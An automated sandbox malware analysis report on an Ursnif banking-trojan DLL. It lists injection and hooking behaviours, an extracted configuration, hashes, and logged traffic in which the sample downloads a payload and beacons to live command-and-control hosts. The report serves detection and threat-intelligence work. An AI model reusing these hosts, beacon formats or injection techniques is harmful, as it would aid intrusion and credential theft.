Analysis Report SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.24850

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.24850 (renamed file extension from 24850 to dll)
Analysis ID: 353290
MD5: 3964ec2fe493ed566a404e9dd33434a5
SHA1: bca121cbdfb1c1212c27de720bcaa5c3a6fa845c
SHA256: 3b98e6c87edfb4da99612025cf485d302d42c184e73bcb727f9807923bfa9850

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.dates? Avira URL Cloud: Label: phishing
Source: http://c56.lepini.at:80/jvassets/xI/t64.dat Avira URL Cloud: Label: phishing
Found malware configuration
Source: regsvr32.exe.4616.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "159", "system": "6be03bf206b95c88679a31dc3afe7d5dhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613466324", "user": "1082ab698695dc15e71ab15cba7efddd", "hash": "0xf857f57e", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll ReversingLabs: Detection: 13%

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49742 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001C.00000002.404227102.000001796D8A0000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.416522356.0000024FD6D20000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.420571619.0000000005A10000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000022.00000002.475458101.0000021EAE11C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.452374047.0000000006FE0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_001C3512
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E54CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_00E54CF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00E5B88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E65518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00E65518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E5834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00E5834C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6AACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B6AACC
Source: C:\Windows\explorer.exe Code function: 37_2_03B67500 FindFirstFileW, 37_2_03B67500
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E516E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00E516E1
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\System32\RuntimeBroker.exe File opened: C:\Users\user\AppData\Local

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.185.68 104.20.185.68
Source: Joe Sandbox View IP Address: 151.101.1.44 151.101.1.44
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/mOmUNrUT1Tkf_/2Fpjx5UP/NjKT2TUVc9KVEb1kN7jSv_2/Bku6FvO8M8/iUmLw2_2FTDrkr5tf/cCMI7qZIJsl5/daUh7ottHLc/7HVIrVoY1SieQv/lhrGpaJPPzKF03EAwxNqA/D874ye_2FRUsy2K6/xciFCEzbH51FFw_/2Bb8QoHf6NpN75pZ5G/Mu_2BbqUp/c75ragbUEKlE0l1LX_2F/4u83BFS0FCNHpZrX6b9/sd4d4jezfNsCefQ_2B6iCK/p1XgqNgeBsVt9/izg8Zsvz/1FaNRSjvruwthZY1A7QfFWz/_2BhfXLKTN/ZLkri3_2BI/e8SUozS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/bGCVCGUTs1lNc2K/wNnB3OIgI6UyqdAGOB/jV4rDmQEa/5PkUFdTsMYKfy1EIClwo/KQRRNWPakwmt0lLxrd_/2FnGpwvYpeqrU_2FkCLx1B/R0mLZmrbcN1d5/hbBQD152/5x461Zj3DyFi2OGwhSRW2md/1hWVGQOyCJ/9LQxsfDNoccGHcKv0/L78mf3QLu0Sk/zV1_2BT5Let/Cc_2Fk7brjJ8bV/ApfXsClf8J9xIYL4HHAXx/QKuHjRTsf_2BovXo/yHAF9g7T1kKJsDp/sou53PD1_2BzlwV1rz/X4cyCrwCA/3b0U_2Fa1EMmx0XXoDT3/0U2j_2FJCnPwGU3lAtd/LtXvsgZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/Ox2TG_2BNHSd/dGpyWpd7v99/zWuL24VyFCHbfP/RMw5PaV_2FkHP8EOsx_2B/QeZetVUX16Ewf2mC/SBZkUPvAhDEW0cg/Bvi6a1h8WxwumngpOl/pVeqsEO1u/F_2Bgph3G05TOwrcOQdP/pdQ6mtv5qQOyd5xTPSR/GNQoUS7yd_2BugnbKugLGo/sIvg7c3rbWlrV/jS2KL7Ow/TFCqCNRX_2BXcmpRqUKbNOU/wZGThNa5OD/T4CIs6JmdPw25wkmp/n5DpqgWckX6B/I9wndBIZWl3/VhxGkN2j0IRS2O/_2F8DuQj3M6qQfhTKxxpI/gFeX9K3CC7PaWcwb/Sw1f9EXRpo7/B HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.457290492.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: :2021021620210217: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 00000027.00000002.578989598.000001E767B42000.00000004.00000001.sdmp String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Feb 2021 00:05:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000025.00000000.461748484.000000000F8A0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/Ox2TG_2BNHSd/dGpyWpd7v99/zWuL24VyFCHbfP/RMw5PaV_2FkHP8EOsx_2B/QeZet
Source: regsvr32.exe, 00000001.00000003.359733941.00000000007BC000.00000004.00000001.sdmp, explorer.exe, 00000025.00000000.461363579.000000000DC97000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/Ox2TG_2BNHSd/dGpyWpd7v99/zWuL24VyFCHbfP/RMw5PaV_2FkHP8EOsx_2B/QeZetVUX16
Source: regsvr32.exe, 00000001.00000003.355772977.00000000007BC000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/bGCVCGUTs1lNc2K/wNnB3OIgI6UyqdAGOB/jV4rDmQEa/5PkUFdTsMYKfy1EIClwo/KQRRNW
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461748484.000000000F8A0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000025.00000000.457476881.0000000008BB0000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/
Source: explorer.exe, 00000025.00000000.457476881.0000000008BB0000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/Cg
Source: explorer.exe, 00000025.00000000.457476881.0000000008BB0000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 00000025.00000000.457476881.0000000008BB0000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.datOe
Source: explorer.exe, 00000025.00000000.457068195.0000000008ABE000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dates?
Source: explorer.exe, 00000025.00000000.461222431.000000000DC20000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, control.exe, 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, control.exe, 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 0000001A.00000003.441667454.0000028E4D08D000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, control.exe, 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001A.00000002.447464468.0000028E4D040000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.449500265.0000028E4D3EF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
